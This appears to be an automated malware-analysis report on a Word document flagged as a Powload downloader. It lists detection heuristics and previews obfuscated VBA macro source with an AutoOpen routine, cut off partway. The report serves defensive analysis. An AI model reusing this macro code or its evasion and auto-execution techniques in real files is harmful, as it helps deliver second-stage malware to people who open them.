MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Startup: Office Application
The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of GetObject/CreateObject to launch Win32_Process via WMI, and obfuscation of the 'winmgmts' keyword. This strongly suggests the macro's intent is to download and execute a second-stage payload, aligning with the ClamAV detection of 'Doc.Downloader.Powload-6957924-0'.
Heuristics 9
-
ClamAV: Doc.Downloader.Powload-6957924-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6957924-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51129 bytes |
SHA-256: 70afdc095a53772248f78736d7a8e0f9fa89a5fc38774aac160b0e5868120cc9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bUZBQX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tAxAxCA"
Attribute VB_Base = "0{FD70A8BA-64EC-4310-8522-28D10BA5D5D5}{80DD4225-9F74-450B-A38F-DA87607FB1DD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "H4Q4kXZ"
Attribute VB_Base = "0{D984F9B4-E6D3-43E0-B098-6BB4DC9349D9}{0E575116-FFB2-46EF-B6FA-1C4B0647BA75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "cAZAAAAZ"
Sub autoopen()
If BAcBUDA = PxU_DkA Then
ElseIf aQAAAGAw = Bk1AxQB Then
aABxUB = (134200036 / 258119089 / bxDAkXB - Cos(672853472 + Tan(QQXGUUA)))
ElseIf TAQQA4Z = aDXAcGA Then
wAA_oAAQ = (727342880 / 270044860 / i1kGUG - Cos(994134197 + Tan(dAAAAA)))
ElseIf oQQkx1BA = qB1owA Then
DDA1xADU = (421763117 / 514397740 / kcUoCAA - Cos(170560570 + Tan(ODQ4XD)))
End If
If JAQQABkC = wDQBXG1 Then
ElseIf AAoZAQ = CwZAAQ Then
NAQXUBA = (86412529 / 552254382 / VGDcAUX - Cos(459026145 + Tan(iDQAUA)))
ElseIf SQB4AA = JBAoQCw Then
ZGwoACAZ = (82540287 / 608052827 / cxAAAX - Cos(156889385 + Tan(MAXkQD1A)))
ElseIf HQAAUZ1x = GDAAZA Then
XoADAAA = (241154974 / 34419033 / fxUQoU_A - Cos(83346995 + Tan(fADUGokC)))
End If
If oA_AAAA = GAQwAwZC Then
ElseIf cU_AQAX = R1A4QBCX Then
KAAAZkQA = (789720868 / 10779 / OAAGoAG - Cos(692882228 + Tan(m_AGcAcD)))
ElseIf HXQo1Q = McUAXA Then
oDcAZG4w = (917908505 / 806782821 / GAAUAAUD - Cos(468809806 + Tan(EDQ_ABA)))
ElseIf ikxAUQQ = cCZ1AxZ Then
EQACUBAo = (290077703 / 952366938 / iDQBAxU - Cos(742431488 + Tan(Fo_Aco)))
End If
wDAcAB
If wDDAoU = mAAxk_AG Then
ElseIf sUXkAocB = D_4A4c_C Then
qDxUACG = (643665592 / 909311540 / hABwAoA1 - Cos(226341843 + Tan(EcG1AA)))
ElseIf zcBXA_ = YowAGGo Then
BZ1kAG = (879157124 / 305699705 / CxDQwA - Cos(805258196 + Tan(DcAACDDA)))
ElseIf iUDAxUAk = QGoAX1Z Then
wDBACD1 = (389467402 / 755470840 / PwoDBocA - Cos(349794603 + Tan(GBA4Uk)))
End If
If jABG4BoA = bxAxQA Then
ElseIf A_wBCGGA = XwAoACDk Then
f4ZQQZA = (319966556 / 380229569 / bAwX1QkU - Cos(908276263 + Tan(XkcAAG)))
ElseIf jGAZXACU = ZDCxAAA Then
BUwUwBA = (144647184 / 370912063 / MZAUAA4G - Cos(41155731 + Tan(rDCAAA_)))
ElseIf kGcGB_ = vo1Bkwwc Then
iQ1DQoU = (556917521 / 146793742 / wcUAZDBZ - Cos(953094481 + Tan(JCQXZAUB)))
End If
If jA1G1X = UXXxQA Then
ElseIf oBGAA_ = wk_QAABB Then
Y_QcAkw = (238015586 / 111520706 / dQw4QB - Cos(662893844 + Tan(IADDUAAQ)))
ElseIf QAAAAAA = bAADc4D Then
IkXXCA = (235122478 / 306466583 / NcDUA_ - Cos(514070394 + Tan(jABAQwD)))
ElseIf pDADQQD = GUGAxA_ Then
IDco_AU = (736594566 / 312899519 / WCBAoZ1A - Cos(918261606 + Tan(RQxUBcUo)))
End If
End Sub
Function Eo_AkQ(HABQGCU)
If DAAkAcD = vXCwAA Then
ElseIf V_QwxDc = hwcXAQ Then
iAAZGx = (633399665 / 498443971 / YAAQwAx - Cos(625012323 + Tan(KDBQxX)))
ElseIf tcAAQXUA = m_kAUAZ1 Then
AUXAwB = (810083705 / 599886473 / Y_GAAAc - Cos(45282855 + Tan(H14xok)))
ElseIf jkAAwwo = zwAUQAAZ Then
TDA__ACC = (699137912 / 105650106 / FGAAAAAA - Cos(433268984 + Tan(rxAkADA)))
End If
If uUAQQQC = wkAcCcxQ Then
ElseIf ukA_4UB = iQCDA4A Then
NcAokAw = (231430453 / 289855476 / i4DZAAD - Cos(847121856 + Tan(TcCBC1)))
ElseIf iDGBU1QA = kAUk1wAc Then
dZAUZAo = (18983017 / 120816890 / CXZUoA - Cos(13680466 + Tan(lDADAGoA)))
ElseIf nCB4ADkA = VAAGQG Then
VUAAAAAX = (251174949 / 887608045 / W4AUBAX4 - Cos(322700329 + Tan(iCkUCABB)))
End If
Set Eo_AkQ = CVar(HABQGCU)
If QAZDUAAA = CA11DD Then
ElseIf Zk4kAUU = rxoAA_BB Then
FDAQc_A = (803495249 / 66952866 / RAXXBZAX - Cos(80731505
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.